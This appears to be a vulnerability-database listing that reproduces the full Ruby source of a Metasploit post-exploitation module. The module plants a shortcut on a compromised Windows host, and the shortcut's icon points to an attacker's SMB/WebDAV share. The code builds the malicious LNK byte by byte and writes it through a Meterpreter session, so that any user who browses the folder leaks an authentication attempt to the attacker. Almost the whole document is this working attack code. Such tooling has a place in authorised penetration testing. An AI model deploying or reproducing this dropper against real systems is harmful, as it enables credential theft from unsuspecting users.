
Windows Escalate SMB Icon LNK Dropper

🗓️ 16 Feb 2012 18:34:19Reported by mubix <[email protected]>Type 
metasploit

The Windows Escalate SMB Icon LNK Dropper module drops a shortcut whose icon location is a UNC path on an attacker-controlled host, so that any user who views the shortcut in Explorer initiates SMB and WebDAV connections to that host.

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

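class MetasploitModule < Msf::Post

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Escalate SMB Icon LNK Dropper',
        'Description' => %q{
          This module drops a shortcut (LNK file) that has a ICON reference
          existing on the specified remote host, causing SMB and WebDAV
          connections to be initiated from any user that views the shortcut.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'mubix' ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              core_channel_eof
              core_channel_open
              core_channel_read
              core_channel_write
              stdapi_fs_getwd
            ]
          }
        }
      )
    )
    register_options(
      [
        OptAddress.new('LHOST', [ true, 'Host listening for incoming SMB/WebDAV traffic', nil]),
        OptString.new('LNKFILENAME', [ true, "Shortcut's filename", 'Words.lnk']),
        OptString.new('SHARENAME', [ true, 'Share name on LHOST', 'share1']),
        OptString.new('ICONFILENAME', [ true, "File name on LHOST's share", 'icon.png'])
      ]
    )
  end

  # Builds the shortcut and writes it into the session's current working
  # directory. Nothing is executed on the target by this module itself: the
  # SMB/WebDAV connection to LHOST is made later, by whichever user's
  # Explorer renders the shortcut's icon.
  def run
    icon_path = "\\\\#{datastore['LHOST']}\\#{datastore['SHARENAME']}\\#{datastore['ICONFILENAME']}"

    print_status 'Creating evil LNK'
    vprint_status "Icon location: #{icon_path}"
    lnk = build_lnk(icon_path)

    print_status "Done. Writing to disk - #{session.fs.dir.pwd}\\#{datastore['LNKFILENAME']}"
    write_lnk(lnk)
    print_status 'Done. Wait for evil to happen..'
  end

  private

  # Serialises the shortcut as raw bytes in the MS-SHLLINK format.
  #
  # The link target itself is a harmless local file (C:\AUTOEXEC.BAT); the
  # part that matters is the ICON_LOCATION string, which points at
  # +icon_path+ on the attacker's host so that Explorer tries to fetch the
  # icon as soon as the shortcut is displayed.
  #
  # @param icon_path [String] UNC path of the icon, e.g. \\host\share\icon.png
  # @return [String] the complete .lnk contents as an ASCII-8BIT byte string
  def build_lnk(icon_path)
    parts = []

    # ShellLinkHeader (0x4c bytes)
    parts << "\x4c\x00\x00\x00"                  # HeaderSize
    parts << "\x01\x14\x02\x00\x00\x00\x00\x00"  # LinkCLSID {00021401-0000-0000-C000-000000000046}
    parts << "\xc0\x00\x00\x00\x00\x00\x00\x46"
    # LinkFlags 0xdb = HasLinkTargetIDList | HasLinkInfo | HasRelativePath |
    # HasWorkingDir | HasIconLocation | IsUnicode. IsUnicode means every
    # StringData entry is UTF-16LE and its count is in characters, not bytes.
    parts << "\xdb\x00\x00\x00"
    parts << "\x20\x00\x00\x00"                  # FileAttributes (FILE_ATTRIBUTE_ARCHIVE)
    parts << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  # CreationTime (fixed FILETIME)
    parts << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  # AccessTime
    parts << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  # WriteTime
    parts << "\x00\x00\x00\x00"                  # FileSize
    parts << "\x00\x00\x00\x00"                  # IconIndex
    parts << "\x01\x00\x00\x00"                  # ShowCommand (SW_SHOWNORMAL)
    parts << "\x00\x00"                          # HotKey
    parts << "\x00\x00"                          # Reserved1
    parts << "\x00\x00\x00\x00"                  # Reserved2
    parts << "\x00\x00\x00\x00"                  # Reserved3

    # LinkTargetIDList (IDListSize 0x7b): My Computer -> C:\ -> AUTOEXEC.BAT
    parts << "\x7b\x00"                          # IDListSize
    parts << "\x14\x00\x1f\x50\xe0\x4f\xd0\x20"  # root item (0x14 bytes), My Computer CLSID
    parts << "\xea\x3a\x69\x10\xa2\xd8\x08\x00"
    parts << "\x2b\x30\x30\x9d\x19\x00\x2f"      # ...followed by the volume item (0x19 bytes)
    parts << 'C:\\'
    parts << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    parts << "\x00\x00\x00\x4c\x00\x32\x00\x00\x00\x00\x00\x7d\x3f\x5b\x15\x20"  # file item (0x4c bytes)
    parts << "\x00"
    parts << 'AUTOEXEC.BAT'
    parts << "\x00\x00\x30\x00\x03\x00\x04\x00\xef\xbe\x7d\x3f\x5b\x15\x7d\x3f"  # 0xbeef0004 extension block
    parts << "\x5b\x15\x14\x00\x00\x00"
    parts << Rex::Text.to_unicode('AUTOEXEC.BAT')
    parts << "\x00\x00\x1c\x00\x00\x00"          # name terminator, extension offset 0x1c, TerminalID

    # LinkInfo (0x3e bytes): local volume, LocalBasePath C:\AUTOEXEC.BAT
    parts << "\x3e\x00\x00\x00\x1c\x00\x00\x00\x01\x00"
    parts << "\x00\x00\x1c\x00\x00\x00\x2d\x00\x00\x00\x00\x00\x00\x00\x3d\x00"
    parts << "\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x3e\x77\xbf\xbc\x10\x00"
    parts << "\x00\x00\x00"
    parts << 'C:\\AUTOEXEC.BAT'
    parts << "\x00\x00"                          # LocalBasePath terminator + empty CommonPathSuffix

    # StringData: a 16-bit character count followed by the UTF-16LE string
    parts << "\x0e\x00"                          # RELATIVE_PATH (14 chars)
    parts << Rex::Text.to_unicode('.\\AUTOEXEC.BAT')
    parts << "\x03\x00"                          # WORKING_DIR (3 chars)
    parts << Rex::Text.to_unicode('C:\\')
    # ICON_LOCATION. The count depends on LHOST/SHARENAME/ICONFILENAME, so it
    # is computed rather than hard-coded; a wrong count makes the parser read
    # the wrong number of characters and misaligns everything that follows.
    parts << [icon_path.length].pack('v')
    parts << Rex::Text.to_unicode(icon_path)

    # ExtraData: one TrackerDataBlock, then the TerminalBlock.
    # BlockSize is 0x60 (96 bytes) — this byte belongs here, not glued onto
    # the end of the icon path as a stray '`' (0x60) character.
    parts << "\x60\x00\x00\x00"                  # BlockSize
    parts << "\x03\x00\x00\xa0"                  # BlockSignature (0xA0000003)
    parts << "\x58\x00\x00\x00"                  # Length (0x58)
    parts << "\x00\x00\x00\x00"                  # Version
    parts << 'computer'.ljust(16, "\x00")        # MachineID: NUL-padded NetBIOS name, 16 bytes
    droid = "\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0\xab\x9f\xb6\xb1\x6c\x84" \
            "\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48\x08\x00\x27\x6f\xe3\x1f"
    parts << droid                               # Droid (volume GUID + object GUID)
    parts << droid                               # DroidBirth
    parts << "\x00\x00\x00\x00"                  # TerminalBlock

    # Force every chunk to ASCII-8BIT before joining so the result is a plain
    # byte string and no Encoding::CompatibilityError can arise from mixing
    # the high-bit literals with the binary output of pack/to_unicode.
    parts.map(&:b).join
  end

  # Writes +data+ to LNKFILENAME in the session's current working directory,
  # releasing the remote file handle even if the write fails part-way.
  #
  # @param data [String] the shortcut bytes produced by build_lnk
  def write_lnk(data)
    file = client.fs.file.new(datastore['LNKFILENAME'], 'wb')
    begin
      file.write(data)
    ensure
      file.close
    end
  end
end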
